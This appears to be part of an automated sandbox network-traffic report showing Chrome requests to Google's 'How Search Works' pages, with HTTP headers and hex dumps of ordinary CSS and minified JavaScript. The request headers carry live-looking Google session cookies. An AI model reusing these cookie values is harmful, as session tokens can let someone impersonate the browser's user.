                                                                                                                                                                                                                                                                                          Data Ascii: -visible: 0;--hsw-button-color-focus-visible: #fff;--hsw-button-box-shadow-focus-visible: inset 0 0 0 1px #fff;--hsw-button-outline-focus-visible: 2px solid #185abc;display:block}.container{appearance:none;background-color:var(--hsw-button-background-colo
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 61 63 74 69 76 65 29 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 68 6f 76 65 72 29 7d 2e 63 6f 6e 74 61 69 6e 65 72 3a 66 6f 63 75 73 7b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 66 6f 63 75 73 29 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 66 6f 63 75 73 29 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 3a 20 76 61 72 28 2d 2d 68 73 77 2d 62 75
                                                                                                                                                                                                                                                                                          Data Ascii: ckground-color-active);--hsw-button-box-shadow: var(--hsw-button-box-shadow-hover)}.container:focus{--hsw-button-background-color: var(--hsw-button-background-color-focus);--hsw-button-color: var(--hsw-button-color-focus);--hsw-button-border: var(--hsw-bu
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 77 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 66 6f 63 75 73 3a 20 30 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 23 64 32 65 33 66 63 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 31 61 37 33 65 38 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 23 31 37 34 65 61 36 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 6f 75 74 6c 69 6e 65 2d 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 31 61 37 33 65 38 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 66 6f 63
                                                                                                                                                                                                                                                                                          Data Ascii: w-button-outline-focus: 0;--hsw-button-background-color-focus-visible: #d2e3fc;--hsw-button-border-focus-visible: 1px solid #1a73e8;--hsw-button-color-focus-visible: #174ea6;--hsw-button-outline-focus-visible: 1px solid #1a73e8;--hsw-button-box-shadow-foc
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 3a 20 23 31 61 37 33 65 38 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 3a 20 23 31 37 34 65 61 36 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 2d 68 6f 76 65 72 3a 20 6e 6f 6e 65 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 61 63 74 69 76 65 3a 20 23 65 38 66 30 66 65 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 61 63 74 69 76
                                                                                                                                                                                                                                                                                          Data Ascii: -button-background-color: transparent;--hsw-button-color: #1a73e8;--hsw-button-background-color-hover: transparent;--hsw-button-color-hover: #174ea6;--hsw-button-box-shadow-hover: none;--hsw-button-background-color-active: #e8f0fe;--hsw-button-color-activ
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 65 72 3a 6e 6f 74 28 2e 63 6f 6e 74 61 69 6e 65 72 2d 2d 74 72 61 6e 73 70 61 72 65 6e 74 29 20 73 76 67 20 5b 66 69 6c 6c 2d 74 61 72 67 65 74 5d 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2c 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 29 7d 2e 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 63 6f 6e 74 61 69 6e 65 72 2d 2d 74 72 61 6e 73 70 61 72 65 6e 74 29 20 73 76 67 20 70 61 74 68 5b 73 74 72 6f 6b 65 5d 7b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2c 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 29 7d 2e 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 63 6f 6e 74 61 69 6e 65 72 2d 2d 74 72 61 6e 73 70 61 72 65 6e 74 29 20 73 76 67 20 70 61 74 68 5b 66 69 6c 6c 5d 3a 6e 6f 74 28 5b
                                                                                                                                                                                                                                                                                          Data Ascii: er:not(.container--transparent) svg [fill-target]{fill:var(--hsw-button-color, currentColor)}.container:not(.container--transparent) svg path[stroke]{stroke:var(--hsw-button-color, currentColor)}.container:not(.container--transparent) svg path[fill]:not([
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 6f 6e 2d 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 32 70 78 20 36 70 78 20 32 70 78 20 72 67 62 61 28 36 30 2c 20 36 34 2c 20 36 37 2c 20 2e 31 35 29 2c 20 30 70 78 20 31 70 78 20 32 70 78 20 30 70 78 20 72 67 62 61 28 36 30 2c 20 36 34 2c 20 36 37 2c 20 2e 33 29 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 3a 20 23 66 66 66 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 2d 68 6f 76 65 72 3a 20 30 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 2d 68 6f 76 65 72 3a 20 23 32 30 32 31 32 34 3b 2d 2d 68 73 77 2d 62 75 74 74 6f 6e 2d 62 6f 78 2d 73 68 61 64 6f 77
                                                                                                                                                                                                                                                                                          Data Ascii: on-border: 1px solid #fff;--hsw-button-box-shadow: 0px 2px 6px 2px rgba(60, 64, 67, .15), 0px 1px 2px 0px rgba(60, 64, 67, .3);--hsw-button-background-color-hover: #fff;--hsw-button-border-hover: 0;--hsw-button-color-hover: #202124;--hsw-button-box-shadow
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:22 UTC1390INData Raw: 26 26 61 26 26 54 28 6f 2c 6e 2c 61 29 2c 61 7d 3b 6c 65 74 20 73 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 28 43 29 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 2e 2e 2e 61 72 67 75 6d 65 6e 74 73 29 2c 74 68 69 73 2e 79 6f 75 74 75 62 65 4d 6f 64 61 6c 43 6f 6e 74 72 6f 6c 6c 65 72 3d 6e 65 77 20 50 28 74 68 69 73 29 2c 74 68 69 73 2e 68 61 73 53 6c 6f 74 43 6f 6e 74 72 6f 6c 6c 65 72 3d 6e 65 77 20 4c 28 74 68 69 73 2c 22 70 72 65 66 69 78 22 2c 22 73 75 66 66 69 78 22 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 64 3d 21 31 7d 67 65 74 20 76 61 72 69 61 6e 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 73 70 6f 6e 73 69 76 65 56 61 6c 75 65 28 74 68 69 73 2e 62 75 74 74 6f 6e 56 61 72 69 61 6e 74 29 7d 63 6f 6e 6e 65 63 74
                                                                                                                                                                                                                                                                                          Data Ascii: &&a&&T(o,n,a),a};let s=class extends E(C){constructor(){super(...arguments),this.youtubeModalController=new P(this),this.hasSlotController=new L(this,"prefix","suffix"),this.disabled=!1}get variant(){return this.responsiveValue(this.buttonVariant)}connect


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          145192.168.2.750109142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1382OUTGET /search/howsearchworks/assets/rwBjrn-0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 7313
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 29 May 2024 21:30:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC531INData Raw: 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 72 65 74 75 72 6e 2f 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7c 7c 6d 28 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 2f 41 6e 64 72 6f 69 64 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 72 65 74 75 72 6e 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 6d 61 63 69 6e 74 6f 73 68 22 29 21 3d 3d 2d 31 26 26 21 21 6e 61 76 69 67 61 74 6f 72 2e 6d 61 78 54 6f 75 63 68 50 6f 69 6e 74 73 26 26 6e 61 76 69 67 61 74 6f 72 2e 6d 61 78 54 6f 75 63 68 50 6f
                                                                                                                                                                                                                                                                                          Data Ascii: function h(){return/iPhone|iPad|iPod/i.test(navigator.userAgent)||m()}function p(){return/Android/i.test(navigator.userAgent)}function m(){return navigator.userAgent.toLowerCase().indexOf("macintosh")!==-1&&!!navigator.maxTouchPoints&&navigator.maxTouchPo
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 6f 61 64 65 72 20 69 73 20 64 69 73 70 6f 73 65 64 22 29 3b 72 65 74 75 72 6e 7d 69 66 28 65 2e 74 65 73 74 28 29 29 7b 6f 28 29 3b 72 65 74 75 72 6e 7d 69 66 28 44 61 74 65 2e 6e 6f 77 28 29 2d 72 3e 63 29 7b 61 28 60 66 61 69 6c 65 64 20 74 6f 20 6c 6f 61 64 20 24 7b 74 7d 20 64 75 65 20 74 6f 20 74 69 6d 65 6f 75 74 60 29 3b 72 65 74 75 72 6e 7d 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6c 29 7d 3b 77 69 6e 64 6f 77 2e 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6c 29 7d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 6f 61 64 65 64 53 63 72 69 70 74 73 5b 74 5d 3d 73 2c 73 2e 63 61 74 63 68 28 6f 3d 3e 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 60 66 61 69 6c 65 64 20 74 6f 20 6c 6f 61
                                                                                                                                                                                                                                                                                          Data Ascii: oader is disposed");return}if(e.test()){o();return}if(Date.now()-r>c){a(`failed to load ${t} due to timeout`);return}window.requestAnimationFrame(l)};window.requestAnimationFrame(l)});return this.loadedScripts[t]=s,s.catch(o=>{console.error(`failed to loa
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 69 73 2e 63 6f 6e 66 69 67 2e 6e 61 6d 65 73 70 61 63 65 7d 5f 5f 61 74 74 72 69 62 75 74 69 6f 6e 60 29 3b 74 68 69 73 2e 61 74 74 72 69 62 75 74 69 6f 6e 45 6c 3d 73 3b 63 6f 6e 73 74 20 6f 3d 74 68 69 73 2e 63 72 65 61 74 65 44 6f 6d 28 22 64 69 76 22 2c 60 24 7b 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6e 61 6d 65 73 70 61 63 65 7d 5f 5f 70 6c 61 79 65 72 60 29 3b 74 68 69 73 2e 70 6c 61 79 65 72 45 6c 3d 6f 3b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 63 72 65 61 74 65 44 6f 6d 28 22 64 69 76 22 2c 60 24 7b 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6e 61 6d 65 73 70 61 63 65 7d 5f 5f 6d 61 73 6b 60 29 3b 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2c 65 2e 61
                                                                                                                                                                                                                                                                                          Data Ascii: is.config.namespace}__attribution`);this.attributionEl=s;const o=this.createDom("div",`${this.config.namespace}__player`);this.playerEl=o;const a=this.createDom("div",`${this.config.namespace}__mask`);e.appendChild(i),e.appendChild(s),e.appendChild(o),e.a
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 72 74 54 69 6d 65 3d 69 29 3b 63 6f 6e 73 74 20 73 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 60 64 61 74 61 2d 24 7b 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6e 61 6d 65 73 70 61 63 65 7d 2d 61 74 74 72 69 62 75 74 69 6f 6e 60 29 3b 73 26 26 28 65 2e 61 74 74 72 69 62 75 74 69 6f 6e 3d 73 29 3b 63 6f 6e 73 74 20 6f 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 60 64 61 74 61 2d 24 7b 74 68 69 73 2e 63 6f 6e 66 69 67 2e 6e 61 6d 65 73 70 61 63 65 7d 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 60 29 3b 72 65 74 75 72 6e 20 6f 26 26 28 65 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3d 6f 29 2c 65 7d 73 65 74 41 63 74 69 76 65 28 74 29 7b 74 3f 28 74 68 69 73 2e 6c 61 73 74 53 63 72 6f 6c 6c 59 3d 77 69 6e 64 6f 77 2e 70 61 67 65 59 4f 66 66 73 65 74 2c 74 68 69 73 2e 6c
                                                                                                                                                                                                                                                                                          Data Ascii: rtTime=i);const s=t.getAttribute(`data-${this.config.namespace}-attribution`);s&&(e.attribution=s);const o=t.getAttribute(`data-${this.config.namespace}-orientation`);return o&&(e.orientation=o),e}setActive(t){t?(this.lastScrollY=window.pageYOffset,this.l
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1390INData Raw: 50 6c 61 79 65 72 53 74 61 74 65 28 29 3d 3d 3d 59 54 2e 50 6c 61 79 65 72 53 74 61 74 65 2e 50 4c 41 59 49 4e 47 3f 74 68 69 73 2e 70 6c 61 79 65 72 2e 70 61 75 73 65 56 69 64 65 6f 28 29 3a 74 68 69 73 2e 70 6c 61 79 65 72 2e 70 6c 61 79 56 69 64 65 6f 28 29 29 7d 65 6c 73 65 28 74 2e 6b 65 79 3d 3d 3d 6e 2e 45 4e 54 45 52 7c 7c 74 2e 6b 65 79 3d 3d 3d 6e 2e 53 50 41 43 45 29 26 26 74 68 69 73 2e 68 61 6e 64 6c 65 45 76 65 6e 74 28 74 29 7d 73 65 74 56 69 73 69 62 6c 65 28 74 29 7b 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 69 73 2e 70 6c 61 79 65 72 26 26 28 74 3f 74 68 69 73 2e 70 6c 61 79 65 72 2e 67 65 74 50 6c 61 79 65 72 53 74 61 74 65 28 29 21 3d 3d 59 54 2e 50 6c 61 79 65 72 53 74 61 74 65 2e 50 4c 41 59 49 4e 47
                                                                                                                                                                                                                                                                                          Data Ascii: PlayerState()===YT.PlayerState.PLAYING?this.player.pauseVideo():this.player.playVideo())}else(t.key===n.ENTER||t.key===n.SPACE)&&this.handleEvent(t)}setVisible(t){window.setTimeout(()=>{this.player&&(t?this.player.getPlayerState()!==YT.PlayerState.PLAYING
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1222INData Raw: 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 7d 2e 79 74 2d 6d 6f 64 61 6c 5f 5f 78 3a 61 66 74 65 72 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 7d 2e 79 74 2d 6d 6f 64 61 6c 5f 5f 78 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 79 74 2d 6d 6f 64 61 6c 5f 5f 6d 61 73 6b 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 30 32 31 32 34 63 63 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 31 7d 2e 79 74 2d 6d 6f 64 61 6c 5f 5f 70 6c 61 79
                                                                                                                                                                                                                                                                                          Data Ascii: rm:translate(-50%,-50%) rotate(45deg)}.yt-modal__x:after{transform:translate(-50%,-50%) rotate(-45deg)}.yt-modal__x:focus{outline:none}.yt-modal__mask{position:absolute;top:0;left:0;width:100%;height:100%;background:#202124cc;z-index:10001}.yt-modal__play


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          146192.168.2.750110142.250.181.2284435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC1382OUTGET /search/howsearchworks/assets/bAPu5B1A.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Origin: https://www.google.com
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/search/howsearchworks/?fg=1
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/uxe-owners-acl/www_google
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="uxe-owners-acl/www_google"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"uxe-owners-acl/www_google","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/uxe-owners-acl/www_google"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1754
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=3000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 08 Mar 2024 16:00:00 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:42:23 UTC531INData Raw: 63 6c 61 73 73 20 6c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 63 61 6c 6c 62 61 63 6b 73 3d 5b 5d 2c 74 68 69 73 2e 61 63 74 69 76 65 42 72 65 61 6b 70 6f 69 6e 74 73 3d 5b 5d 2c 74 68 69 73 2e 73 63 68 65 64 75 6c 65 64 3d 21 31 2c 74 68 69 73 2e 71 75 65 72 69 65 73 3d 5b 7b 6e 61 6d 65 3a 22 64 65 73 6b 74 6f 70 22 2c 71 75 65 72 79 3a 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 34 34 30 70 78 29 22 29 7d 2c 7b 6e 61 6d 65 3a 22 6c 61 70 74 6f 70 2d 67 74 22 2c 71 75 65 72 79 3a 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 6d 69 6e 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 29 22 29 7d 2c 7b 6e 61 6d 65 3a 22 74 61 62 6c
